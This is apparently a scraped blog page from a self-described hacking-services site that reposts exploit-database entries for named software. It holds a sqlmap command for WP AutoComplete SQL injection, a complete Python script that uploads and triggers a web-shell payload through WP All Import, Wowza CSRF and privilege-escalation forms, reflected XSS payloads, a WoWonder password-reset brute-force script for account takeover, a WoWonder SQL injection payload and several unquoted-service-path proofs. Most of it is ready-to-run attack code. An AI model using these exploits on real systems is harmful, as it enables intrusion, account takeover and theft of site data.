# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali linux
---------------------------------------
The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,
leading to an unauthenticated SQL injection
--------------------------------------
How to Reproduce this Vulnerability:
1. Install WP AutoComplete <= 1.0.4
2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests
3. Find requests belong to WP AutoComplete like step 5
4. Start sqlmap and exploit
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000×tamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863123713
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 11/05/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://www.wpallimport.com/
# Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version)
# Version: <= 3.6.7 (tested: 3.6.7)
# Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload)
# CVE: CVE-2022-1565
#!/usr/bin/python
import requests
import re
import os
# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work.
# If a file with the same name as the payload is already on the server, the upload will OVERWRITE it
#
# Please notice that I'm NOT the researcher who found this vulnerability
# # # # # VULNERABILITY DESCRIPTION # # # # #
# The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7.
# This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible.
# # # # # HOW THE EXPLOIT WORKS # # # # #
# 1. Prepare the zip file:
# - create a PHP file with your payload (e.g. rerverse shell)
# - set the variable "payload_file_name" with the name of this file (e.g. "shell.php")
# - create a zip file with the payload
# - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip")
#
# 2. Login using an administrator account:
# - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /)
# - set the variable "admin_user" with the username of an administrator account
# - set the variable "admin_pass" with the password of an administrator account
#
# 3. Get the wpnonce using the get_wpnonce_upload_file() method
# - there are actually 2 types of wpnonce:
# - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class.
# This wpnonce allows us to change the plugin settings (check the step 4)
# - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class.
# This wpnonce allows us to upload the file
#
# 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class
# - if the Secure Mode is enabled, the zip content will be put in a folder with a random name.
# The exploit will disable the Secure Mode.
# By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url).
# The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str)
# - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode.
#
# 5. Upload the file using the upload_file(wpnonce_upload_file: str) method
# - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully.
# The response will contain a JSON that looks like this:
# {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"}
# As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed
#
# 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method
#
# 7. Activate the payload using the activate_payload() method
# - you can define a method to activate the payload.
# There reason behind this choice is that this exploit does NOT provide any payload.
# Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters
# # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # #
# According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "MAnaged Imports page"
# I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?)
# I had to find a workaround and so I did, by exploiting this option.
# WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7
# # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # #
# In order for the exploit to work please consider the following:
# 1. check the target_url and the admin credentials
# 2. check the path of the zip file and the name of the payload (they can be different)
# 3. if you're testing locally, try to set verify_ssl_certificate on False
# 4. you can use print_response(http_response) to investigate further
# Configure the following variables:
target_url = "https://vulnerable.wp/wordpress" # Target base URL
admin_user = "admin" # Administrator username
admin_pass = "password" # Administrator password
zip_file_to_upload = "/shell.zip" # Path to the ZIP file (e.g /root/shell.zip)
payload_file_name = "shell.php" # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell)
verify_ssl_certificate = True # If True, the script will exit if the SSL Certificate is NOT valid. You can set it on False while testing locally, if needed.
# Do NOT change the following variables
wp_login_url = target_url + "/wp-login.php" # WordPress login page
wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings" # Plugin page settings
payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name # Payload will be uploaded here
re_enable_secure_mode = False
session = requests.Session()
# This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files.
class PluginSetting:
# Regular Expression patterns
pattern_setting_secure_mode = r'<input[a-zA-Z0-9="_\- ]*id="secure"[a-zA-Z0-9="_\-/ ]*>'
pattern_wpnonce_edit_settings = r'<input[a-zA-Z0-9="_\- ]*id="_wpnonce_edit\-settings"[a-zA-Z0-9="_\- ]*value="([a-zA-Z0-9]+)"[a-zA-Z0-9="_\-/ ]*>'
pattern_wpnonce_upload_file = r'wp_all_import_security[ ]+=[ ]+["\']{1}([a-zA-Z0-9]+)["\']{1};'
http_response: requests.Response
is_secure_mode_enabled: bool
wpnonce_edit_settings: str
wpnonce_upload_file: str
def __init__(self, http_response: requests.Response):
self.http_response = http_response
self.check_if_secure_mode_is_enabled()
self.retrieve_wpnonce_edit_settings()
self.retrieve_wpnonce_upload_file()
def check_if_secure_mode_is_enabled(self):
# To tell if the Secure Mode is enabled you can check if the checkbox with id "secure" is checked
# <input type="checkbox" value="1" id="secure" name="secure" checked="checked">
regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text)
if not regex_search:
print("Something went wrong: could not retrieve plugin settings. Are you an administrator?")
# print_response(self.http_response) # for debugging
exit()
self.is_secure_mode_enabled = "checked" in regex_search.group()
def retrieve_wpnonce_edit_settings(self):
# You can find this wpnonce in the source file by searching for the following input hidden:
# <input type="hidden" id="_wpnonce_edit-settings" name="_wpnonce_edit-settings" value="052e2438f9">
# 052e2438f9 would be the wpnonce for editing the settings
regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text)
if not regex_search:
print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?")
# print_response(self.http_response) # for debugging
exit()
self.wpnonce_edit_settings = regex_search.group(1)
def retrieve_wpnonce_upload_file(self):
# You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b';
# dee75fdb8b would be the wpnonce for the upload
regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text)
if not regex_search:
print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable")
# print_response(self.http_response) # for debugging
exit()
self.wpnonce_upload_file = regex_search.group(1)
def wp_login():
global session
data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 }
login_cookie = { "wordpress_test_cookie" : "WP Cookie check" }
# allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found.
# Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not
print("Trying to login...")
response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate)
if response.status_code == 302:
print("Logged in successfully!")
return
# print_response(response) # for debugging
print("Login failed. If the credentials are correct, try to print the response to investigate further.")
exit()
def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response:
global session
if set_to_enabled:
print("Enabling secure mode...")
else:
print("Disabling secure mode...")
print("Edit settings wpnonce value: " + wpnonce)
data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 }
response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate)
if response.status_code == 403:
print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?")
# print_response(response) # for debugging
exit()
return response
def switch_back_to_secure_mode():
global session
print("Re-enabling secure mode...")
response = session.get(url=wp_all_import_page_settings)
plugin_setting = PluginSetting(response)
if plugin_setting.is_secure_mode_enabled:
print("Secure mode is already enabled")
return
response = set_plugin_secure_mode(set_to_enabled=True,wpnonce=plugin_setting.wpnonce_edit_settings)
new_plugin_setting = PluginSetting(response)
if not new_plugin_setting.is_secure_mode_enabled:
print("Something went wrong: secure mode has not been re-enabled")
# print_response(response) # for debugging
exit()
print("Secure mode has been re-enabled!")
def get_wpnonce_upload_file() -> str:
global session, re_enable_secure_mode
# If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload
# If Secure Mode is already disabled, it just returns the wpnonce for the upload
print("Checking if secure mode is enabled...")
response = session.get(url=wp_all_import_page_settings)
plugin_setting = PluginSetting(response)
if not plugin_setting.is_secure_mode_enabled:
re_enable_secure_mode = False
print("Insecure mode is already enabled!")
return plugin_setting.wpnonce_upload_file
print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.")
response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings)
new_plugin_setting = PluginSetting(response)
if new_plugin_setting.is_secure_mode_enabled:
print("Something went wrong: secure mode has not been disabled")
# print_response(response) # for debugging
exit()
print("Secure mode has been disabled!")
re_enable_secure_mode = True
return new_plugin_setting.wpnonce_upload_file
def upload_file(wpnonce_upload_file: str):
global session
print("Uploading file...")
print("Upload wpnonce value: " + wpnonce_upload_file)
zip_file_name = os.path.basename(zip_file_to_upload)
upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file
files = { "async-upload" : (zip_file_name, open(zip_file_to_upload, 'rb'))}
data = { "name" : zip_file_name }
response = session.post(url=upload_url, files=files, data=data)
if response.status_code == 200:
print("Server replied with HTTP 200 OK. The upload should be completed.")
print("Payload should be here: " + payload_url)
print("If you can't find the payload at this URL, try to print the response to investigate further")
# print_response(response) # for debugging
return 1
else:
print("Something went wrong during the upload. Try to print the response to investigate further")
# print_response(response) # for debugging
return 0
def activate_payload():
global session
print("Activating payload...")
response = session.get(url=payload_url)
if response.status_code != 200:
print("Something went wrong: could not find payload at " + payload_url)
# print_response(response) # for debugging
return
def print_response(response:requests.Response):
print(response.status_code)
print(response.text)
# Entry Point
def Main():
print("Target: " + target_url)
print("Credentials: " + admin_user + ":" + admin_pass)
# Do the login
wp_login()
# Retrieve wpnonce for upload.
# It disables Secure Mode if needed, then returns the wpnonce
wpnonce_upload_file = get_wpnonce_upload_file()
# Upload the file
file_uploaded = upload_file(wpnonce_upload_file)
# Re-enable Secure Mode if needed
if re_enable_secure_mode:
switch_back_to_secure_mode()
# Activate the payload
if file_uploaded:
activate_payload()
Main()
<!--
Wowza Streaming Engine 4.5.0 Remote Privilege Escalation Exploit
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: 4.5.0 (build 18676)
Platform: JSP
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: The application suffers from a privilege escalation issue. Normal
user (read-only) can elevate his/her privileges by sending a POST request
seting the parameter 'accessLevel' to 'admin' gaining admin rights and/or
setting the parameter 'advUser' to 'true' and '_advUser' to 'on' gaining
advanced admin rights.
Advanced Admin:
Allow access to advanced properties and features
Only for expert Wowza Streaming Engine users.
Tested on: Winstone Servlet Engine v1.0.5
Servlet/2.5 (Winstone/1.0.5)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5340
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php
03.07.2016
--
Privilege escalation from existing read-only user to admin(advanced):
-->
<html>
<body>
<form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
<input type="hidden" name="version" value="0" />
<input type="hidden" name="action" value="quickEdit" />
<input type="hidden" name="userName" value="usermuser" />
<input type="hidden" name="userPassword" value="" />
<input type="hidden" name="userPassword2" value="" />
<input type="hidden" name="accessLevel" value="admin" />
<input type="hidden" name="advUser" value="true" />
<input type="hidden" name="_advUser" value="on" />
<input type="hidden" name="ignoreWarnings" value="false" />
<input type="submit" value="God mode" />
</form>
</body>
</html>
Wowza Streaming Engine 4.5.0 Multiple Cross-Site Scripting Vulnerabilities
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: 4.5.0 (build 18676)
Platform: JSP
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: Wowza Streaming Engine suffers from multiple reflected cross-site
scripting vulnerabilities when input passed via several parameters to
several scripts is not properly sanitized before being returned to the
user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.
Tested on: Winstone Servlet Engine v1.0.5
Servlet/2.5 (Winstone/1.0.5)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5343
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
03.07.2016
--
http://localhost:8088/enginemanager/applications/live/main/view.htm?vhost=_defaultVHost_&appName=live<script>alert(1)</script>
http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3A42%3A32%2B02%3A00&periodEnd=2016-07-03T14%3a42%3a32%2b02%3a00<script>alert(2)</script>
http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3a42%3a32%2b02%3a00<script>alert(3)</script>&periodEnd=2016-07-03T14%3A42%3A32%2B02%3A00
http://localhost:8088/enginemanager/applications/liveedge/securityplayback/edit.htm?appName=test<script>alert(4)</script>&vhost=_defaultVHost_
---
POST /enginemanager/applications/liveedge/main/edit.htm
Host: localhost:8088
vhost=_defaultVHost_";alert(5)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(6)</script>§ion=main&version=1467548313123&action=new&description=desctest&mpegDash=true&_mpegDash=on&appleHLS=true&_appleHLS=on&adobeRTMP=true&_adobeRTMP=on&adobeHDS=true&_adobeHDS=on&msSmooth=true
---
POST /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm
Host: localhost:8088
vhost=_defaultVHost_&uiAppName=test";alert(7)//&uiAppType=Live+Edge+Application&instanceName=";alert(8)//§ion=publishers_panasonic_camcorder";alert(9)//&version=0&driverName=Panasonic&publishersStreamFileName=panasonicstreamname&cameraIpAddress=1.1.1.1&appType=liveedge";alert(10)//&appName=test
---
POST /enginemanager/applications/liveedge/securityplayback/edit.htm HTTP/1.1
Host: localhost:8088
vhost=_defaultVHost_";alert(11)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(12)</script>§ion=securityplayback&version=1467549110876&_requireSecureRTMPConnection=on&secureTokenState=Protect+all+protocols+using+hash+(SecureToken+version+2)&sharedSecret=sharedtestsecret&hashAlgorithm=SHA
---
POST /enginemanager/applications/liveedge/streamtarget/add.htm HTTP/1.1
Host: localhost:8088
enabled=true&protocol=RTMP&destinationName=akamai&destApplicationRequired=false&destAppInstanceRequired=false&usernameRequired=true&passwordRequired=true&wowzaCloudDestinationType=1*/alert(13)//&facebookAccessToken=&facebookDestName=&facebookDestId=&facebookEventSourceName=&wowzaDotComFacebookUrl=https%3A%2F%2Ffb.wowza.com%2Fwsem%2Fstream_targets%2Fv1&connectionCode=&protocolShoutcast=Shoutcast
---
-------------------------------------------------------------------------------------------------------------------
| Script | Parameter |
-------------------------------------------------------------------------------------------------------------------
| |
/enginemanager/applications/live/main/view.htm | appName |
/enginemanager/applications/liveedge/main/edit.htm | uiAppType |
/enginemanager/applications/liveedge/main/edit.htm | vhost |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | appType |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | instanceName |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | section |
/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm | uiAppType |
/enginemanager/applications/liveedge/securityplayback/edit.htm | appName |
/enginemanager/applications/liveedge/securityplayback/edit.htm | uiAppType |
/enginemanager/applications/liveedge/securityplayback/edit.htm | vhost |
/enginemanager/applications/liveedge/streamtarget/add.htm | wowzaCloudDestinationType |
/enginemanager/applications/liveedge/streamtarget/wizard.htm | appName |
/enginemanager/applications/liveedge/streamtarget/wizard.htm | vhost |
/enginemanager/applications/monitoring/historical.jsdata | periodEnd |
/enginemanager/applications/monitoring/historical.jsdata | periodStart |
/enginemanager/applications/new.htm | uiAppName |
/enginemanager/server/mediacachesource/edit.htm | action |
/enginemanager/server/mediacachesource/edit.htm | maxTTLDays |
/enginemanager/server/mediacachesource/edit.htm | maxTTLHours |
/enginemanager/server/mediacachesource/edit.htm | maxTTLMinutes |
/enginemanager/server/mediacachesource/edit.htm | maxTTLSeconds |
/enginemanager/server/mediacachesource/edit.htm | minTTLDays |
/enginemanager/server/mediacachesource/edit.htm | minTTLHours |
/enginemanager/server/mediacachesource/edit.htm | minTTLMinutes |
/enginemanager/server/mediacachesource/edit.htm | minTTLSeconds |
/enginemanager/server/mediacachestore/edit.htm | action |
/enginemanager/server/transcoderencode/edit.htm | action |
/enginemanager/server/transcoderencode/edit.htm | appType |
/enginemanager/server/transcoderencode/edit.htm | templateName |
/enginemanager/server/vhost/streamfile/new.htm | streamName |
/enginemanager/transcoder/new.htm | appType |
/enginemanager/transcoder/new.htm | dstTemplate |
/enginemanager/applications/monitoring/app.jsdata | appName |
/enginemanager/applications/monitoring/historical.jsdata | appName |
/enginemanager/applications/monitoring/historical.jsdata | vhost |
/enginemanager/server/logs/getlog.jsdata | filter |
/enginemanager/server/logs/getlog.jsdata | logMode |
/enginemanager/server/logs/getlog.jsdata | logName |
/enginemanager/server/logs/getlog.jsdata | logType |
| |
---------------------------------------------------------------------------------|--------------------------------|
Wowza Streaming Engine 4.5.0 Local Privilege Escalation
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: Wowza Streaming Engine 4.5.0 (build 18676)
Wowza Streaming Engine Manager 4.5.0 (build 18676)
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: Wowza Streaming Engine suffers from an elevation of privileges
vulnerability which can be used by a simple authenticated user that
can change the executable file with a binary of choice. The vulnerability
exist due to the improper permissions, with the 'F' flag (Full) for
'Everyone' group. In combination with insecure file permissions the
application suffers from an unquoted search path issue impacting the
services 'WowzaStreamingEngine450' and 'WowzaStreamingEngineManager450'
for Windows deployed as part of Wowza Streaming software.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Java Version: 1.8.0_77
Java VM Version: 25.77-b03
Java Architecture: 64
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5339
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5339.php
03.07.2016
--
C:\Users\lqwrm>sc qc WowzaStreamingEngineManager450
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WowzaStreamingEngineManager450
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wowza Streaming Engine Manager 4.5.0
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\lqwrm>cacls "C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe"
C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe Everyone:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
==========
C:\Users\lqwrm>sc qc WowzaStreamingEngine450
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WowzaStreamingEngine450
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wowza Streaming Engine 4.5.0
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\lqwrm>icacls "C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe"
C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
<!--
Wowza Streaming Engine 4.5.0 CSRF Add Advanced Admin Exploit
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: 4.5.0 (build 18676)
Platform: JSP
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Winstone Servlet Engine v1.0.5
Servlet/2.5 (Winstone/1.0.5)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5341
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
03.07.2016
--
-->
<html>
<body>
<form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
<input type="hidden" name="version" value="0" />
<input type="hidden" name="action" value="new" />
<input type="hidden" name="userName" value="thricer" />
<input type="hidden" name="userPassword" value="123123" />
<input type="hidden" name="userPassword2" value="123123" />
<input type="hidden" name="accessLevel" value="admin" />
<input type="hidden" name="advUser" value="true" />
<input type="hidden" name="_advUser" value="on" />
<input type="hidden" name="ignoreWarnings" value="false" />
<input type="submit" value="Execute" />
</form>
</body>
</html>
# Exploit Title: WoWonder Social Network Platform 3.1 - Authentication Bypass
# Date: 11.06.2021
# Exploit Author: securityforeveryone.com
# Researchers : Security For Everyone Team - https://securityforeveryone.com
# Vendor Homepage: https://www.wowonder.com/
# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
# Version: < 3.1
# Tested on: Linux/Windows
'''
DESCRIPTION
In WoWonder < 3.1, remote attackers can take over any account due to the weak cryptographic algorithm in recover.php. The code parameter is easily predicted from the time of day.
The vulnerability is found the "code" parameter in password reset link. The password reset code can be estimated by combining the password reset link time and the random value generated between 111 and 999.
if an attacker exploits this vulnerability, attacker may access all accounts in WoWonder application.
ABOUT SECURITY FOR EVERYONE TEAM
We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
'''
import requests
import email.utils as eut
import calendar, time;
import hashlib, re;
url = "http://wowonderlab:80/wowonder/" #change this with your target
myheaders = {"X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"}
recoverdata = {"recoveremail": "wowondertest@securityforeveryone.com"} #change this email with your registered wowonder email address
req = requests.post(url+"requests.php?f=recover", headers=myheaders, data=recoverdata)
b = eut.parsedate(req.headers["Date"])
respepoch = calendar.timegm(time.strptime("{0}-{1}-{2} {3}:{4}:{5}".format(b[0],b[1],b[2],b[3],b[4],b[5]), '%Y-%m-%d %H:%M:%S'))
for token in range(111,1000):
str2hash = "{0}{1}".format(token,respepoch)
email_code = hashlib.md5(str2hash.encode()).hexdigest()
req_reset = requests.get(url+"index.php?link1=reset-password&code=1_{0}".format(email_code))
if len(re.findall("New password",req_reset.text)) == 1:
print(email_code)
resetdata = {"password": "10711071", "id": "1_"+email_code}
reqtoken = requests.post(url+"requests.php?f=reset_password", headers=myheaders, data=resetdata)
print(reqtoken.headers['Set-Cookie'])
break
# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection
# Date: 16.03.2021
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://www.wowonder.com/
# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
# Version: < 3.1
# Tested on: Linux/Windows
DESCRIPTION
In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter.
The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php.
Example:
/requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID
if an attacker exploits this vulnerability, attacker may access private data in the database system.
EXPLOITATION
# GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1
# Host: Target
Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs
Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF
# Exploit Title: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path
# Exploit Author: Antonio Cuomo (arkantolo)
# Exploit Date: 2022-03-09
# Vendor : ilwebmaster21
# Version : WOW21_Service 5.0.1.9
# Vendor Homepage : https://wow21.life/
# Tested on OS: Windows 10 Pro x64
#PoC :
==============
C:\>sc qc WOW21_Service
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: WOW21_Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files\WOW21\WOW21_Service.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : WOW21_Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
# Exploit Title: WorkTime 10.20 Build 4967 - Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage: https://www.worktime.com/
# Software Link: https://www.worktime.com/download/worktime_corporate.exe
# Tested Version: 10.20 Build Build 4967
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
WorkTime Server srvWorkTimeServer
C:\WorkTime\WorkTimeServerService.exe
Auto
WorkTime Reports Scheduler WorkTimeReportsScheduler
C:\Program Files\WorkTimeAdministrator\WorkTimeReportsScheduler.exe
Auto
WorkTime Client Watcher Service WTCWatch
C:\Program Files\wtc\WTCWatch.exe WTCWatch
Auto
C:\Users\psycho>sc qc WorkTimeReportsScheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WorkTimeReportsScheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\WorkTimeAdministrator\WorkTimeRepo
rtsScheduler.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WorkTime Reports Scheduler
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\psycho>sc qc WTCWatch
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WTCWatch
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\wtc\WTCWatch.exe WTCWatch
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WorkTime Client Watcher Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
===========================================================================================
# Exploit Title: WorkSuite PRM 2.4 - 'password' SQL Inj.
# Dork: N/A
# Date: 01-05-2019
# Exploit Author: Mehmet EMİROĞLU
# Vendor Homepage: https://codecanyon.net/item/worksuite-project-management-system/20052522
